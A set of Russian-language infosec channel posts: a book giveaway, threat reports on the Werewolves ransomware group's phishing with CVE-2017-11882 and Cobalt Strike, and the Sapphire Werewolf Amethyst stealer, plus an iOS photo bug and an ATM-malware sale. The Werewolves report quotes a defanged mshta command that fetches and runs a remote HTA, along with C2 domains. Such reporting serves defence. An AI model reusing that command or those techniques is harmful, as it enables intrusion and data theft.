⚡️Разыгрываем новые книги по информационной безопасности и этичному хакингу (в бумажном варианте):

- Black Hat Python: программирование для хакеров и пентестеров.
- Хакерство. Физические атаки с использованием хакерских устройств.
- Kali Linux в действии. Аудит безопасности информационных систем.
- Контролируемый взлом. Библия социальной инженерии.
- Хакерство. Секреты мастерства.
- Компьютер глазами хакера.
- Командная строка Linux.
- Современный PowerShell.

• Всего будет 10 призовых мест, а победители смогут выбрать любую понравившуюся книгу из списка выше. Итоги подведем ровно через неделю (25.05 в 19:00) при помощи бота который рандомно выберет победителя.

Для участия нужно:

1. Быть подписанным на наш канал @infosec_globe;
2. Подписаться на канал моих друзей @it_secur;
3. Нажать на кнопку «Участвовать».
 
Учитывайте, что бот может немного подвиснуть — не переживайте, просто нажмите еще раз на кнопку «Участвовать».

#Конкурс

͏Исследователи F.A.C.C.T. сообщили о новой волне атак с вредоносными рассылками со стороны Werewolves, специализирующейся на вымогательстве с помощью версии программы-вымогателя LockBit3 (Black), собранной на основе утекшего билдера.

Банда практикует технику двойного давления на жертву: кроме вымогательства за расшифровку данных, злоумышленники выкладывают на сайте информацию о тех, кто отказался платить выкуп, сумма которого обычно составляет 130 000 - 1 000 000$.

Ранее в апреле этого года вымогатели засветили, осуществляя массовые рассылки на тему весеннего призыва и досудебных претензий.

Целями новых атак стали российские промышленные предприятия, телекоммуникационные и IT-компании, финансовые и страховые организации.

Злоумышленники создали фейковый сайт крупного российского производителя спецтехники, полностью эмулировав содержимое оригинального портала с помощью HTTrack Website Copier. Отличие заключалось лишь в доменном имени: у оригинального - com, у фейка - ru.

Письма с темами «Досудебная претензия» и «Рекламация» содержали вредоносные вложения, загружающие Cobalt Strike Beacon.

После того, как жертва открывает вложенный документ «Рекламация.doc» загружается RTF-документ, эксплуатирующий уязвимость CVE-2017-11882.

На устройство жертвы доставляется HTA (HTML Application): mshta https://iplis[.]ru/laydowngrenade.jpeg -> hxxp://vlasta-s[.]ru/logista.hta.

HTA-файл выполняет powershell-команду, в результате которой распаковывается и запускается шелл-код Cobalt Strike Stager, который загружает Сobalt Strike Beacon, конфигурация которого содержит watermark: 987654321 и C&C: poopy[.]aarkhipov[.]ru.

• Красивая и наглядная Модель OSI в качестве шпаргалки для начинающих.

• А я напоминаю, что собрал для Вас необходимый материал для изучения компьютерных сетей вот в этом репозитории: https://github.com/SE-adm/Awesome-network/

• Если есть желание дополнить список полезного материала, то пишите по контактам в описании репо.

#Сети

После шквала мемов, сопровождающих скандал по поводу конфиденциальности пользовательских данных в яблочных девайсах, Apple решила экстренно выпустить iOS 17.5.1.

Обнаруженный баг был вызван тем, что фотографии удалялись из приложения Photos, но не из файлового менеджера, а после обновления до iOS 17.5 удаленные таким образом фото вновь появились в ленте медиатеки.

Похоже, что баг был связан с процессом переиндексации после обновления iOS, при котором система по ошибке пересохранила фотографии из файлового менеджера в приложении Photos.

Тем не менее, англоязычные владельцы сразу же преуспели в конспирологию и начали муссировать слухи про негласные договоренности Apple со спецслужбами по поводу "mirroring" данных и изображений.

Конечно, никаких доказательств никто так и нашел, но неприятный осадочек остался.

Ресерчеры BI.ZONE сообщают об активности Sapphire Werewolf, которая модифицировала опенсорс-стилер для проведения новых атак в целях кибершпионажа.

Начиная с марта 2024 года Sapphire Werewolf реализовала уже более 300 атак на российские организации в сфере образования, промышленности, ИТ, ВПК и космоса с использованием стилера Amethyst, который злоумышленники разработали на основе программы с открытым исходным кодом - SapphireStealer.

Атакующие распространяли вредоносное ПО с помощью фишинговых электронных писем со ссылками в формате t[.]ly под видом постановления о возбуждении исполнительного производства, информационного бюллетеня ЦИК, а также указа Президента РФ.

После открытия вредоносного файла осуществляется создание папки %AppData%\Microsoft\EdgeUpdate, из Resources.MicrosoftEdgeUpdate в нее записывается MicrosoftEdgeUpdate.exe. Попутно производится запись отвлекающего документа в текущую директорию и его открытие.

Для обеспечения персистентности в системе жертвы осуществляется создание задачи в планировщике с помощью встроенной в исполняемый файл библиотеки FunnyCat.Microsoft.Win32.TaskScheduler.dll.

Имя, описание и путь к исполняемому файлу в задаче маскируются под легитимную задачу MicrosoftEdgeUpdateTaskMachineCore.

После закрепления осуществляется запись стилера Amethyst (в файл VPN.exe во временной папке данных) и его запуск, сопровождающийся изменением зоны безопасности исполняемого потока на MyComputer, а также созданием асинхронной задачи, которая впоследствии отправит собранные файлы на С2.

Собранные файлы сохраняются в папку, названием которой является строка, сгенерированная с помощью UUID. Папка находится в каталоге с временными файлами.

Стиллер собирает файлы конфигурации мессенджера Telegram, файлы с различными расширениями и с внешних носителей, данные из браузеров (Chrome, Opera, Yandex, Brave, Edge и др.), а также журналы использования PowerShell и конфиги FileZilla и SSH.

Собранные материалы помещаются в архив и отправляются на С2, а в последних версиях при создании архива используется пароль и добавляется комментарий с данными по хосту.

Роль командного сервера для отправки архива выполнял бот в Telegram, токен которого, как и идентификатор пользователя, находился в ПО.

При этом злоумышленники в код разных версий ВПО указывали не один, а сразу несколько токенов и идентификаторов пользователя. Если главный бот или основной клиент были недоступны, вредоносное ПО обращалось к другим.

IOCs и рекомендации по обнаружению вредоносной активности - в отчете.

В киберподполье набирает популярность нацеленный на банкоматы в Европе новый штамм вредоносного ПО под названием EU ATM Malware с заявленной беспрецедентной эффективностью в 99%.

Согласно утверждениям селлера, EU ATM Malware способен расчехлить практически любой европейский банкомат и до 60% устройств по всему миру, производимых Diebold Nixdorf, Hyosung, Oki, Bank of America, NCR, GRG, Hitachi и др.

Заявленные экономические ТТХ вредоноса гарантируют покупателю до 30 000 долларов за банкомат, при этом модностью автоматизировано, обеспечивая развертывание и эксплуатацию. Но также имеет и ручной режим работы.

Селлер предлагает гибкую систему оплаты и готов предоставить ежемесячную подписку, демоверсию полезной нагрузки на срок до трех дней, а также первоначальный взнос с выделением доли прибыли от успешных операций.

Насколько EU ATM Malware соответствует заявленным характеристикам и станет ли реальной угрозой банковского сектора в Европе пока не ясно, но будем посмотреть.